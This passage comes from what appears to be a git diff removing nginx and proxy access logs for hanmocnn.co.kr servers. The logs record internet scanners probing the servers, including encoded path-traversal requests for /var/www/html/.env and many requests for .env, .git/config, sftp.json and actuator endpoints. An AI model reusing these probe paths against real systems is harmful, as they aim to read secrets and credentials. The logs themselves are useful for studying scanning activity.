/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1" -2026/02/15 00:19:14 [warn] 376#376: *408 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/15 00:19:21 [warn] 376#376: *472 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1" -2026/02/15 00:19:22 [warn] 376#376: *474 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1" -2026/02/15 00:34:33 [warn] 377#377: *564 using uninitialized "server" variable while logging request, client: 81.29.142.6, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr" -2026/02/15 01:55:47 [warn] 506#506: *3933 using uninitialized "server" variable while logging request, client: 2.58.56.62, server: asset.hanmocnn.co.kr -2026/02/16 08:37:39 [warn] 861#861: *34202 using uninitialized "server" variable while logging request, client: 91.224.92.99, server: asset.hanmocnn.co.kr -2026/02/16 09:57:24 [warn] 862#862: *34326 using uninitialized "server" variable while logging request, client: 167.172.221.95, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr" -2026/02/17 06:06:06 [warn] 906#906: *42459 using uninitialized "server" variable while logging request, client: 45.94.31.224, server: asset.hanmocnn.co.kr -2026/02/17 18:19:14 [warn] 933#933: *79701 using uninitialized "server" variable while logging request, client: 45.94.31.224, server: asset.hanmocnn.co.kr diff --git a/npm/data/logs/proxy-host-3_access.log b/npm/data/logs/proxy-host-3_access.log index 0d7732b..0d0c5c5 100644 --- a/npm/data/logs/proxy-host-3_access.log +++ b/npm/data/logs/proxy-host-3_access.log @@ -1,1200 +1,4 @@ -[14/Feb/2026:23:32:51 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/3102295512641" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-" -[14/Feb/2026:23:33:00 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 23.178.112.212] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:33:01 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 13.215.209.28] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:33:02 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 34.220.255.182] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:33:02 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 13.51.200.205] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:33:03 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 3.144.114.8] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:33:47 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/" [Client 143.110.213.72] [Length 39176] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:48 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/server" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:49 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/server-status" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:51 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/about" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:52 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/login.action" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/v2/_catalog" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.DS_Store" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:54 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.env" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:56 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:58 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.git/config" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:59 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/graphql" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:00 +0000] - 301 301 - POST http mail.hanmocnn.co.kr "/api" [Client 143.110.213.72] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:00 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/api/graphql" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:01 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/graphql/api" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:01 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/api/gql" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:01 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:02 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/config.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:04 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/telescope/requests" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:05 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/info.php" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:06 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.well-known/security.txt" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:07 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/actuator/env" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:09 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger-ui.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:10 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger/index.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:11 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:12 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:13 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:14 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:15 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/v2/api-docs" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:16 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/v3/api-docs" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:17 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/api-docs/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:18 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/api/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:19 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/@vite/env" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:20 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.vscode/sftp.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:21 +0000] - 405 405 - OPTIONS http mail.hanmocnn.co.kr "/" [Client 143.110.213.72] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:22 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 143.110.213.72] [Length 10778] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:23 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:35:45 +0000] - 200 200 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:35:45 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 39183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:35:48 +0000] - 404 404 - HEAD http mail.hanmocnn.co.kr "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:04 +0000] - 200 200 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:04 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 39176] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:48 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:36:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:36:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/images/favicon.ico?s=1748763912" [Client 222.117.41.51] [Length 1691] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/" -[14/Feb/2026:23:37:00 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:39:18 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:39:28 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" -[14/Feb/2026:23:40:11 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 10723] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:14 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 185.177.72.60] [Length 262106] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js.map" [Client 185.177.72.60] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:16 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:16 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 26] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:16 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:18 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:18 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:18 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 10724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:18 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:19 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 185.177.72.60] [Length 262106] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:24 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" -[14/Feb/2026:23:40:25 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 